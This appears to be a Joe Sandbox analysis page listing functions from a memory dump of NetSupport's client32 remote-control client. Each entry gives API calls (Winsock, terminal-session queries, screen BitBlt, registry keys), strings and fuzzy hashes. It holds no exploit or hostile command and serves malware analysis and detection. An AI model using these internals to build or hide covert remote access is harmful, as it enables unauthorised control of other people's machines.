Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
String ID: 0$MakeOwnerDraw
API String ID: 1249465458-1190305232
Opcode ID: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
Opcode Fuzzy Hash: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94

Function 1112B9B0 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112B9E6
GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112BA03
GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112BA0D
GetProcAddress.KERNEL32(00000000,socket), ref: 1112BA1B
GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112BA29
GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112BA37
FreeLibrary.KERNEL32(00000000), ref: 1112BAAC

Strings

WSAStartup, xrefs: 1112B9FD
ws2_32.dll, xrefs: 1112B9CB
WSAIoctl, xrefs: 1112BA2B
WSACleanup, xrefs: 1112BA05
closesocket, xrefs: 1112BA1D
socket, xrefs: 1112BA0F

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
API String ID: 2449869053-2279908372
Opcode ID: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
Instruction ID: 1bba0573f20789ca060975004b1edadb32616992e73bf794dbb13e42fcf3a639
Opcode Fuzzy Hash: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
Instruction Fuzzy Hash: 5231B371B11228ABEB249F758C55FEEF7B8EF8A315F104199FA09A7280DA705D408F94

Function 1102370A Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 363windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1115BAE0: IsIconic.USER32(?), ref: 1115BB87
Part of subcall function 1115BAE0: ShowWindow.USER32(?,00000009), ref: 1115BB97
Part of subcall function 1115BAE0: BringWindowToTop.USER32(?), ref: 1115BBA1

CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102384D
ShowWindow.USER32(?,00000003), ref: 110238D1
LoadMenuA.USER32(00000000,000013A3), ref: 110239FB
GetSubMenu.USER32(00000000,00000000), ref: 11023A09
CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023A29
GetDlgItem.USER32(?,000013B2), ref: 11023A3C
GetWindowRect.USER32(00000000), ref: 11023A43
PostMessageA.USER32(?,00000111,?,00000000), ref: 11023A99
DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 11023AA3

Strings

AddToJournal, xrefs: 110239AB
Chat, xrefs: 110239B0

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
String ID: AddToJournal$Chat
API String ID: 693070851-2976406578
Opcode ID: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
Instruction ID: 808c1e48a155f27d2b3c0586fadc3707d2cf985dccefb9094def5a9ab05a8e38
Opcode Fuzzy Hash: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
Instruction Fuzzy Hash: 58A10334F44616ABDB08CF64CC85FAEB3E9AB8C704F50452DE6569F6C0DBB4A900CB95

Function 110F7300 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 137libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll,B6DE5DE1,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73FD
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451

Strings

WTSQuerySessionInformationA, xrefs: 110F7368
WTSFreeMemory, xrefs: 110F73BD, 110F73F7
Wtsapi32.dll, xrefs: 110F7328

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastLibraryProc$Free$Load
String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
API String ID: 2188719708-2019804778
Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61

Function 1103F520 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 126windowCOMMON

Download Yara Rule

APIs

Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276

GetDlgItem.USER32(?,00000472), ref: 1103F557

Part of subcall function 11160450: SetPropA.USER32(00000000,00000000,00000000), ref: 1116046E
Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F

wsprintfA.USER32 ref: 1103F5D1
GetSystemMenu.USER32(?,00000000), ref: 1103F5F6
EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103F604
SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
MessageBeep.USER32(00000000), ref: 1103F696

Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB

Strings

%sblockapp.jpg, xrefs: 1103F5CB
Client, xrefs: 1103F5AD
m_hWnd, xrefs: 1103F640, 1103F675
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1103F63B, 1103F670
BlockedAppFile, xrefs: 1103F5A8

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1300213680-78349004
Opcode ID: 7c2201f2c80f33de9750c030e09f16f483515752695e717344ad66d71fdaabb4
Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
Opcode Fuzzy Hash: 7c2201f2c80f33de9750c030e09f16f483515752695e717344ad66d71fdaabb4
Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55

Function 11133B00 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11133B70
GetTickCount.KERNEL32 ref: 11133BA1
SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
GetTickCount.KERNEL32 ref: 11133BBC

Strings

CommonPath, xrefs: 11133BDF
Software\NSL, xrefs: 11133BE4
Warning. SHGetFolderPath took %d ms, xrefs: 11133BC6
%s%s, xrefs: 11133B6A, 11133C0E
schplayer.exe, xrefs: 11133BF8
runplugin.exe, xrefs: 11133B4E
HasStudentComponents=%d, xrefs: 11133C37

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$FolderPathwsprintf
String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
API String ID: 1170620360-4157686185
Opcode ID: 1bd09d36bd8b4ec96fa62f4566b89fb65d80ed2a55d6967008e3e898936f5430
Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
Opcode Fuzzy Hash: 1bd09d36bd8b4ec96fa62f4566b89fb65d80ed2a55d6967008e3e898936f5430
Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795

Function 11029A70 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 97windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C

Part of subcall function 111449B0: GetTickCount.KERNEL32 ref: 11144A18

wsprintfA.USER32 ref: 11029AD7
MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
ExitProcess.KERNEL32 ref: 11029B29
_strrchr.LIBCMT ref: 11029B65
ExitProcess.KERNEL32 ref: 11029BA4

Strings

Info. assert, restarting..., xrefs: 11029B8D
V12.10F20, xrefs: 11029AC3
8zi, xrefs: 11029B2F, 11029B42
Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s, xrefs: 11029AD1
Client32, xrefs: 11029B05
Assert. File %hs, line %d, err %d, Expr %s, xrefs: 11029AA6

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExitProcess$CountErrorLastMessageTick_strrchrwsprintf
String ID: 8zi$Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s$Assert. File %hs, line %d, err %d, Expr %s$Client32$Info. assert, restarting...$V12.10F20
API String ID: 2763122592-3192953508
Opcode ID: 8a833f80db5b175683db6ea6e878e7e7d4720c00ec76e4fd0bf018cbd89bf7a5
Instruction ID: c5a0ce661eca6497550e5933a7b6f938ff52ce28890c697c88001472fbb9a828
Opcode Fuzzy Hash: 8a833f80db5b175683db6ea6e878e7e7d4720c00ec76e4fd0bf018cbd89bf7a5
Instruction Fuzzy Hash: 7531FB79A42226AFE712DFE4CDC5F76B7A8EB4474CF540024F629C7284E770A840CB61

Function 1105F200 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 368COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1105F251
wsprintfA.USER32 ref: 1105F265

Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000,?,00000000,75BF8400,?,?,1105F29C,80000001), ref: 110ED59B

Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C

wsprintfA.USER32 ref: 1105F5D6

Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4

Strings

IsA(), xrefs: 1105F3D6, 1105F439, 1105F480, 1105F4CA, 1105F501, 1105F68E, 1105F6DB
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1105F3D1, 1105F434, 1105F47B, 1105F4C5, 1105F4FC, 1105F689, 1105F6D6
Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList, xrefs: 1105F5D0
NetSupport School, xrefs: 1105F310, 1105F44C, 1105F4A5
Software\NetSupport Ltd, xrefs: 1105F254
%s\%s, xrefs: 1105F245, 1105F25F
Software\Productive Computer Insight, xrefs: 1105F238, 1105F5C5
ConfigList, xrefs: 1105F2E7, 1105F36C, 1105F628
NetSupport School Pro, xrefs: 1105F330, 1105F493
General\ProductId, xrefs: 1105F30B, 1105F32B, 1105F3F1, 1105F6A9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 273891520-33395967
Opcode ID: ed90b4243bd6dba26e06e556fb449f96cf7ec5206247bc0b6313832902c8b824
Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
Opcode Fuzzy Hash: ed90b4243bd6dba26e06e556fb449f96cf7ec5206247bc0b6313832902c8b824
Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61

Function 11003A70 Relevance: 19.7, APIs: 13, Instructions: 168COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000004), ref: 11003AB4

Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111

InflateRect.USER32(?,000000FF,000000FF), ref: 11003ACF
GetSysColor.USER32(00000010), ref: 11003AE2
GetSysColor.USER32(00000010), ref: 11003AF9
GetSysColor.USER32(00000014), ref: 11003B10
GetSysColor.USER32(00000014), ref: 11003B27
GetSysColor.USER32(00000014), ref: 11003B44
GetSysColor.USER32(00000014), ref: 11003B5B
GetSysColor.USER32(00000010), ref: 11003B72
GetSysColor.USER32(00000010), ref: 11003B89
GetSysColor.USER32(00000004), ref: 11003BA0
SetBkColor.GDI32(?,00000000), ref: 11003BA7
InflateRect.USER32(?,000000FE,000000FD), ref: 11003BB5

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$InflateRect$Text
String ID:
API String ID: 657964945-0
Opcode ID: 318f3da814b2ce04f99a31686663e64bd9c78f40e740d547c410fcbbf528797a
Instruction ID: 3ee13edaada55836f5c9bdf598aded5104d57c704eb36727280113911ab8aa13
Opcode Fuzzy Hash: 318f3da814b2ce04f99a31686663e64bd9c78f40e740d547c410fcbbf528797a
Instruction Fuzzy Hash: 1F5161B5A002096FE714DFA5CC41FBFB3B9EB94704F104A18E611A76C1D6B1B9008BA1

Function 110EFDC0 Relevance: 19.6, APIs: 13, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 110EFDD8
CreateCompatibleDC.GDI32(00000000), ref: 110EFDF8
SelectObject.GDI32(00000000,11142F70), ref: 110EFE02
CreateCompatibleDC.GDI32(00000000), ref: 110EFE08
GetObjectA.GDI32(11142F70,00000018,?), ref: 110EFE16
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 110EFE25
SelectObject.GDI32(00000000,00000000), ref: 110EFE30
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 110EFE56
SelectObject.GDI32(00000000,11142F70), ref: 110EFE61
DeleteDC.GDI32(00000000), ref: 110EFE6A
SelectObject.GDI32(11003D76,11142F70), ref: 110EFE7A
DeleteDC.GDI32(11003D76), ref: 110EFE80
ReleaseDC.USER32(00000000,00000000), ref: 110EFE85

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
